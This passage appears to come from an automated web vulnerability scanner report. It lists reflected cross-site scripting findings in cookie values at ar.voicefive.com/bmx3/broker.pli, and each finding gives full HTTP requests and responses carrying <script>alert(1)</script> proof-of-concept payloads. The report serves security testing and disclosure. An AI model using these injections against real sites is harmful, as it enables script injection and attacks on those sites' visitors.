GET /bmx3/broker.pli?pid=p97464717&PRAd=1468426&AR_C=150255 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C72a67<script>alert(1)</script>343b05d7516

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:27:43 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97464717=exp=2&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:27:43 2011&prad=1468426&arc=150255&; expires=Sun 11-Sep-2011 11:27:43 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30495

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1468426",Pid:"p97464717",Arc:"150255",Location:COMSC
...[SNIP]...
recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p20101109&prad=11794&arc=15313&exp=1307963601', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C72a67<script>alert(1)</script>343b05d7516', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10
...[SNIP]...

4.263. http://ar.voicefive.com/bmx3/broker.pli [UID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 2608b<script>alert(1)</script>6f230c1f87f was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97464717&PRAd=1468426&AR_C=150255 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-13056631722608b<script>alert(1)</script>6f230c1f87f; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:27:43 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97464717=exp=2&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:27:43 2011&prad=1468426&arc=150255&; expires=Sun 11-Sep-2011 11:27:43 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30495

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1468426",Pid:"p97464717",Arc:"150255",Location:COMSC
...[SNIP]...
1794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-13056631722608b<script>alert(1)</script>6f230c1f87f', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p20101109&prad=11794&arc=15313&exp=1307963601
...[SNIP]...

4.264. http://ar.voicefive.com/bmx3/broker.pli [ar_p101866669 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p101866669 cookie is copied into the HTML document as plain text between tags. The payload effb1<script>alert(1)</script>99aa9a36e4d was submitted in the ar_p101866669 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97464717&PRAd=1468426&AR_C=150255 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&effb1<script>alert(1)</script>99aa9a36e4d; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:27:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97464717=exp=2&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:27:40 2011&prad=1468426&arc=150255&; expires=Sun 11-Sep-2011 11:27:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30495

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1468426",Pid:"p97464717",Arc:"150255",Location:COMSC
...[SNIP]...
n Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&effb1<script>alert(1)</script>99aa9a36e4d', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10
...[SNIP]...

4.265. http://ar.voicefive.com/bmx3/broker.pli [ar_p101945457 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p101945457 cookie is copied into the HTML document as plain text between tags. The payload 8f32b<script>alert(1)</script>d86dcd47717 was submitted in the ar_p101945457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97464717&PRAd=1468426&AR_C=150255 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&8f32b<script>alert(1)</script>d86dcd47717; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:27:41 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97464717=exp=2&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:27:41 2011&prad=1468426&arc=150255&; expires=Sun 11-Sep-2011 11:27:41 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30495

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1468426",Pid:"p97464717",Arc:"150255",Location:COMSC
...[SNIP]...
460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&8f32b<script>alert(1)</script>d86dcd47717', "BMX_BR": 'pid=p20101109&prad=11794&arc=15313&exp=1307963601', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p8147900
...[SNIP]...

4.266. http://ar.voicefive.com/bmx3/broker.pli [ar_p20101109 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p20101109 cookie is copied into the HTML document as plain text between tags. The payload dad32<script>alert(1)</script>09aed43ee4e was submitted in the ar_p20101109 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97464717&PRAd=1468426&AR_C=150255 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&dad32<script>alert(1)</script>09aed43ee4e; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:27:42 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97464717=exp=2&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:27:42 2011&prad=1468426&arc=150255&; expires=Sun 11-Sep-2011 11:27:42 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30495

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1468426",Pid:"p97464717",Arc:"150255",Location:COMSC
...[SNIP]...
itExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&dad32<script>alert(1)</script>09aed43ee4e', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC":
...[SNIP]...

4.267. http://ar.voicefive.com/bmx3/broker.pli [ar_p56282763 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p56282763 cookie is copied into the HTML document as plain text between tags. The payload 507b9<script>alert(1)</script>591d345a3ba was submitted in the ar_p56282763 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97464717&PRAd=1468426&AR_C=150255 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&507b9<script>alert(1)</script>591d345a3ba; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:27:41 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97464717=exp=2&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:27:41 2011&prad=1468426&arc=150255&; expires=Sun 11-Sep-2011 11:27:41 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30495

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1468426",Pid:"p97464717",Arc:"150255",Location:COMSC
...[SNIP]...
2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&507b9<script>alert(1)</script>591d345a3ba', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p
...[SNIP]...

4.268. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 9c5ea<script>alert(1)</script>e3d7f402293 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97464717&PRAd=1468426&AR_C=150255 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&9c5ea<script>alert(1)</script>e3d7f402293; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:27:41 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97464717=exp=2&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:27:41 2011&prad=1468426&arc=150255&; expires=Sun 11-Sep-2011 11:27:41 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30495

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1468426",Pid:"p97464717",Arc:"150255",Location:COMSC
...[SNIP]...
